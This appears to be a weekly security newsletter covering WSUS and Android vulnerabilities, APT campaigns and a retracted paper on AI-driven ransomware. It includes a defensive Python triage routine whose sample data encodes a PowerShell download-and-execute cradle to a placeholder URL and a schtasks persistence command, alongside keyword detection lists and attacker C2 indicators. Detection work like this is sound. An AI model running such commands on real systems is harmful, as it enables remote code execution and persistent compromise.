EvilBit Threat Digest - The Phantom Menace: WSUS Exploits, Android Zero-Clicks, and AI Lies
Wednesday security digest on urgent patches for WSUS and Android, new APT campaigns, and warnings about dubious AI-driven ransomware claims.
It’s KryptoKat. Some weeks, the universe has a particularly dark sense of humor. You’ve got state-sponsored actors playing "let's pretend we're Web3 recruiters," while admins are frantically trying to patch the very systems they use to… well, patch things. It’s like finding out your fire extinguisher is flammable. And just when you think you’ve seen it all, a major university has to retract a paper because its AI-in-ransomware stats were apparently generated by a different kind of AI: academic imagination.
It was a week that perfectly illustrates the maxim, "No system is so esteemed as one that patches with punctuality."
Let's get into it.
The "Patch Now, Not Later" Department
If you run Windows servers or manage a fleet of Android devices, grab your coffee and pay attention. These are the fires you need to put out first.
WSUS Under Siege: In a turn of events that is both beautifully ironic and deeply concerning, Microsoft has confirmed active, in-the-wild exploitation of CVE-2025-59287. This is a critical unauthenticated remote code execution vulnerability in Windows Server Update Services (WSUS). An attacker can waltz up to your update server on port 8530 or 8531 and gain full control. Check Point’s weekly brief flagged this, and Microsoft has since rolled out an out-of-band security update. Patch your patchers, and for the love of all that is holy, don't expose WSUS to the internet.
Android's Silent Threat: Not to be left out, Google dropped a bombshell in its November 2025 Android Security Bulletin. Say hello to CVE-2025-48593, a critical-rated, zero-click RCE in the Android System component itself. Affecting Android versions 13 through 16, this vulnerability could allow an attacker to execute arbitrary code without a single tap from the user. While the fix is included in the 2025-11-01 patch level, we all know the Android update ecosystem is a cruel lottery. Enforce your MDM policies and pray your device OEMs are on the ball.
The Usual Suspects: New Campaigns, Old Tricks
Threat actors have been busy, deploying a mix of clever social engineering and reliable, off-the-shelf tooling.
Lazarus Group's Casting Call: The Lazarus Group’s crypto-focused subdivision, BlueNoroff, continues its spree with campaigns dubbed "GhostCall" and "GhostHire." As detailed by Kaspersky, they are targeting developers and executives in the Web3 space with fake job interviews and meeting invitations to sling malware on both Windows and macOS. The use of bogus Zoom calls to coax victims into running malicious AppleScript is a particularly nice touch.
Silent Lynx on the Prowl: In a detailed report, Seqrite has outlined "Operation Peek-a-Baku," an ongoing espionage campaign by the Silent Lynx APT targeting diplomatic and infrastructure entities in Central Asia. The attack chain is a classic for a reason: a spearphishing email delivers an archive containing a .lnk file. That shortcut executes a Base64-encoded PowerShell command to download the next stage from GitHub. The toolset includes custom C++ loaders, a .NET stager that uses schtasks for persistence, and the Ligolo-ng tool for post-compromise tunneling. Defenders should check out the report for a wealth of IOCs, including hashes and C2s like updates-check-microsoft.ddns.net and the IP 206.189.11.142.
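A small triage routine for the chain described above, added here as an example and not code from the Seqrite report: it decodes `-EncodedCommand` arguments found in process-creation command lines, flags download-cradle text in the decoded script, and flags `schtasks /create` persistence. The sample command lines and the GitHub URL inside them are constructed placeholders, not indicators from the report.

```python
import base64
import re

# Added detection example, not code from the Seqrite report: flag the two
# Silent Lynx-style steps visible in process command lines, an encoded
# PowerShell download cradle and schtasks-based persistence.
CRADLE_TERMS = ("downloadstring", "downloadfile", "invoke-webrequest",
                "net.webclient", "invoke-expression", "iex", "github")
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand (any abbreviation), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Return the indicator names one process command line triggers."""
    hits, low = [], cmdline.lower()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_powershell")
        if any(term in decoded.lower() for term in CRADLE_TERMS):
            hits.append("download_cradle")
    if "schtasks" in low and "/create" in low:
        hits.append("schtasks_persistence")
    return hits


def triage(lines):
    """Keep only the lines that trigger at least one indicator."""
    return {line: classify(line) for line in lines if classify(line)}


# Constructed sample command lines (Sysmon / event 4688 style); the GitHub URL
# is a placeholder, not an indicator from the report.
_CRADLE = ("IEX (New-Object Net.WebClient).DownloadString("
           "'https://raw.githubusercontent.com/placeholder-org/repo/stage2.txt')")
SAMPLE_LINES = [
    r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(_CRADLE.encode("utf-16le")).decode(),
    r'schtasks.exe /create /sc minute /mo 5 /tn "Updater" /tr C:\Users\Public\stager.exe',
    r'schtasks.exe /query /tn "Backup"',
]
```

Feeding real command-line fields from your EDR or Sysmon export into `triage` gives a first-pass list to hunt through; tune `CRADLE_TERMS` to your environment's legitimate scripts.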
Research, Retractions, and a Dose of Reality
This week also brought a few stories that are less about immediate threats and more about the landscape we operate in.
TEE.fail: A Physical Threat to Digital Trust: Researchers demonstrated TEE.fail, a physical side-channel attack capable of extracting secrets from the supposedly secure Trusted Execution Environments (TEEs) in modern Intel and AMD chips. By physically probing the DDR5 memory bus, the attack can recover cryptographic keys. While this requires hands-on access to the hardware, it's a sobering reminder that "confidential computing" isn't magic—your data is only as secure as the server room it lives in.
MIT Sloan's AI Fairy Tale: In a moment of much-needed sanity, MIT Sloan was forced to quietly shelve a research paper that claimed, with a straight face, that over 80% of 2024 ransomware incidents were "AI-driven." After security researchers like Kevin Beaumont and Marcus Hutchins publicly pointed out the complete lack of credible methodology, the paper was memory-holed, and an MIT article citing it was neutered with an editor's note. Let this be a lesson: always demand evidence for extraordinary claims, especially when "AI" is involved. Stick to defending against actual, documented TTPs, not marketing buzzwords.
That’s a wrap. The lesson of the week seems to be: patch your infrastructure, don't trust unsolicited job offers from shadowy benefactors, and maybe, just maybe, don't base your entire security strategy on a graduate student's fever dream.
Stay paranoid.
— UncleSp1d3r & KryptoKat